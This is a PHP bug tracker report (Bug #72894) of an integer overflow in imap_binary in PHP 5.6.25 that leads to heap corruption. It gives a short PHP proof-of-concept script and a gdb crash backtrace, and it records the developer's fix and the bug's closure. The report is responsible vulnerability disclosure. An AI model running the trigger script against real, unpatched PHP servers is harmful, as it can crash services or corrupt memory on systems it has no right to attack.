PHP :: Bug #72894 :: integer overflow in imap

Bug #72894	integer overflow in imap_binary caused heap corruption
Submitted:	2016-08-19 07:22 UTC	Modified:	2017-02-13 01:29 UTC
From:	minhrau dot vc dot 365 at gmail dot com	Assigned:	stas (profile)
Status:	Closed	Package:	IMAP related
PHP Version:	5.6.25	OS:	ALL
Private report:	No	CVE-ID:	None

View Developer Edit

[2016-08-19 07:22 UTC] minhrau dot vc dot 365 at gmail dot com

Description:
------------
An integer overflow in imap_binary function will lead to heap corruption. Please see comment about this vulnerability below:

PHP_FUNCTION(imap_binary)
{
...

	decode = rfc822_binary(text, text_len, &newlength); // this string from rfc822_binary has length > INT_MAX; must check this
...

Test script:
---------------
<?php

ini_set('memory_limit', -1);


$str = str_repeat('a', 0xffffffff/2);
var_dump(strlen($str));

$str1 = imap_binary($str);

var_dump(strlen($str1));
chunk_split($str1, 11, $str1);
?>

Expected result:
----------------
No Crash

Actual result:
--------------
Starting program: /home/minhrau/PHP-5.6.25/sapi/cli/php testimap_binary.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
int(2147483647)
int(-1336212046)

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff10a2f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6
(gdb) bt
#0  0x00007ffff10a2f78 in __memcpy_avx_unaligned () from /usr/lib/libc.so.6
#1  0x000000000085c3b3 in zif_chunk_split (ht=3, return_value=0x7ffff7fa00c8, return_value_ptr=0x7ffff7f6b0d8, this_ptr=0x0, return_value_used=0) at /home/minhrau/PHP-5.6.25/ext/standard/string.c:2218
#2  0x00000000009cc4a5 in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f6b230) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:558
#3  0x00000000009d40d5 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f6b230) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:2602
#4  0x00000000009ca998 in execute_ex (execute_data=0x7ffff7f6b230) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:363
#5  0x00000000009cb384 in zend_execute (op_array=0x7ffff7f9f800) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:388
#6  0x0000000000986884 in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/minhrau/PHP-5.6.25/Zend/zend.c:1341
#7  0x00000000008f77e0 in php_execute_script (primary_file=0x7fffffffe2a0) at /home/minhrau/PHP-5.6.25/main/main.c:2613
#8  0x0000000000aa9606 in do_cli (argc=2, argv=0x1381960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:994
#9  0x0000000000aaa654 in main (argc=2, argv=0x1381960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:1378
(gdb)

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-09-02 06:24 UTC] stas@php.net

-Assigned To: +Assigned To: stas

[2016-09-02 06:24 UTC] stas@php.net

The fix is in security repo as 0f1eb74e92191e817b4198ceda4e8f093699da62 and in https://gist.github.com/39b697c75a0502e091a1191f83029034
please verify

[2016-09-05 05:28 UTC] minhrau dot vc dot 365 at gmail dot com

Patch looks good.

[2016-09-13 04:13 UTC] stas@php.net

-Status: Assigned +Status: Closed

[2016-09-13 04:13 UTC] stas@php.net

The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

[2017-02-13 01:29 UTC] stas@php.net

-Type: Security +Type: Bug

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Sat Nov 08 09:00:01 2025 UTC